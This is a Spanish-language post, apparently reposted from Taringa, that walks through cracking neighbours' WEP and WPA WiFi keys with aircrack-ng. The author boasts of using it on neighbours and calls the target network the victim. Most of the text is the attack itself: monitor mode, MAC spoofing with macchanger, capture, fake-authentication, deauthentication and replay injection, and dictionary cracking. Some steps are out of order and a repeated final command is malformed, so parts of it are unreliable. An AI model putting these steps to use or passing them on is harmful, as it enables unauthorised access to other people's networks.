Eh leido miles de articulos de como sacar una clave WiFi con aircrack, todas bastante complejas para quien realmente no conoce mucho de linux o simplemente no trabaja mucho con la consola del mismo, y buscando por ahi encontre mi guia definitiva con la que de seguro eh, logrado mas de un dolor de cabeza a mis vecinos, los cuales no protegen sus redes ni menos aun saben como hacerlo.

En estos dias la mayoria de las conexiones de nuestros ISP biene con un paquete wifi de regalo y muchos de estos usuarios ya tienen notebook por lo que las señales que logro agarrar en mi sector son muchas.

ahora como se hace para poder descifrar la contraseña de una red inalambrica con cifrado WEP y WPA.

WEP : (Wired Equivalent Privacy). Sistema de cifrado del estándar IEEE 802.11 como protocolo para redes Wi-Fi,Permite cifrado de nivel dos y está basado en el algoritmo RC4, utilizando claves de 64 bits o 128 bits. Se considera un sistema de seguridad débil, por lo tanto se incorporó una solución temporal llamada TKIP para mejorar las falencias del WEP.

WPA : (Wi-Fi Protected Access). WPA y WP2. Es una clase de sistemas de seguridad para redes inalambricas. Fue creado en respuesta a los serios problemas y debilidades encontrados en el sistema de seguridad anterior llamado WEP.  WPA se implementa en la mayoría de los estándares 802.11i, y fue diseñado para trabajar con todas las tarjetas de redes inalámbricas, pero no necesariamente podrán trabajar con la primera generación de puntos de accesos inalámbricos. WPA2 implementa el estándar completo, pero no trabajará con algunas tarjetas de red antiguas.  WEP es generalmente mostrado como la primera elección para la seguridad en redes en la mayoría de las instrucciones de instalación de redes inalámbricas. En tanto, por lo general, WPA y WPA2 están como segunda opción, aunque son más seguros que el primero.

Para crackear WPA necesitas un Diccionario, y aircrack probara palabra por palabra que se encuentre dentro del diccionario para intentar descifrar, entonces, si la contraseña no se encuentra dentro de esta, no la descifrara!, Tambien necesitas un Cliente conectado, para usar una Falsa Autenticacion, si no consigues ningun cliente conectado no podrás crackear la clave!

Descarga del diccionario para WPA

1.- Lo primero es instalar la Suite aircrack-ng

sudo apt-get install aircrack-ng

2.- Luego instalamos Macchanger

sudo apt-get install macchanger

Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambrica, dando click derecho en el icono de la red y desactivando la red inalambrica, y abrimos una terminal:

3.- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR), lo mejor si no pasa a modo monitor es leer información sobre tu tarjeta de red y saber si lo puede hacer o no!

Sudo airmon-ng start wlan0

Vemos que nos sale que se activo en mon0, asi es que trabajaremos con mon0

4.- Damos de Baja mon0

sudo ifconfig mon0 down

5.- Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55

sudo macchanger -m 00:11:22:33:44:55 mon0

6.- Damos de alta mon0

sudo ifconfig mon0 up

7.- Escaneamos las redes disponibles, y encontraremos nuestra victima

sudo airodump-ng mon0

esta partes es la mas importante ya que detectaremos cual es la red a la que atacaremos, la red que envia mas paquetes es siempre la mejor y la mas alta, tambien la que menos demorara en el descifrado de la contraseña, si la contraseña es WEP sera mucho mas facil que si es WPA, asi que este es el momento de elejir... para parar el proceso de busqueda basta con precionar ctrl+c

8.- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima

sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

9.-Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red, cambiando los datos de los corchetes por los de nuestra victima

para WEP

sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

para WPA

sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

10.- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima

para WEP

sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0

escribimos "y" de si pero en ingles y apretamos enter

para WPA

sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap

11.- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima

sudo aircrack-ng -z [nombre red]*.cap

y esperamos a que nos descifre la clave, una ves descifrada con exito te dara la clave en formato [XX:XX:XX:XX:XX], y activa tu red inalambrica dando click derecho al icono de la red, Seleccionamos la red crackeada e ingresamos la clave que nos dio de resultado aircrack en formato XXXXXXXXXX. Y LISTO! ya crackeaste una red WIFI con encriptacion WEP o WPA.

Listado tarjetas para hacer auditoria Wireless

fuente : http://javius.taringa.net/perfil/enriqg9

sudo aireplay-ng -2 -p 0841 -c FFFFFFF -b [direccion MAC] -h 00:11:22:33:44:55 mon0